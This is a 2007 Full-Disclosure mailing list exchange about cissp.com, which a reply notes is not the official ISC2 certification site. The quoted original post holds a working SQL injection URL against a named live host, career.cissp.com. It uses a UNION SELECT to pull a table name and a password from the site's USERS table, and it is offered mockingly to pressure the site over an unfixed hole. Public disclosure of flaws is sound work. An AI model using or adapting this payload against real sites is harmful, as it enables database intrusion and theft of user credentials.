[Full-disclosure] CISSP, round two
Ray P
sixsigma98 at hotmail.com
Tue Aug 7 01:50:01 BST 2007
Nobody paid them. It's not an official CISSP site. That one would be found
at www.isc2.org
http://www.cissp.com/about/about_us.asp - "CISSP.com and all related web
sites are an effort by Mr. Afifi to help promote Information Security
awareness, the CISSP Certification, share knowledge and communication
amongst certified information system security professionals and to help
information security professionals who are seeking to become CISSPs."
I'm certain he is happy to have promoted your level of awareness. :-)
>From: Tonu Samuel <tonu at jes.ee>
>To: full-disclosure at lists.grok.org.uk
>Subject: [Full-disclosure] CISSP, round two
>Date: Mon, 06 Aug 2007 20:00:28 +0300
>
>Long time ago someone posted here SQL injection on CISSP page. No
>changes. I post slightly "modified" version to bug them again
>
>http://career.cissp.com/Bios/CompanyBio.asp?EmployerID=10328199%20union%
>20select%201,2,3,(select%20top%201%20name%20from%20sysobjects%20where%
>20name%20like%20'%25user%25'%20and%20xtype='U'),(select%20top%201%
>20password%20from%
>20USERS),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--&Section=Welcome
>
>
>Who paid $$$ to them to get "certificate"? hehe :P
>
> Tõnu
>
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
_________________________________________________________________
A new home for Mom, no cleanup required. All starts here.
http://www.reallivemoms.com?ocid=TXT_TAGHM&loc=us
Full-Disclosure is hosted and sponsored by Secunia.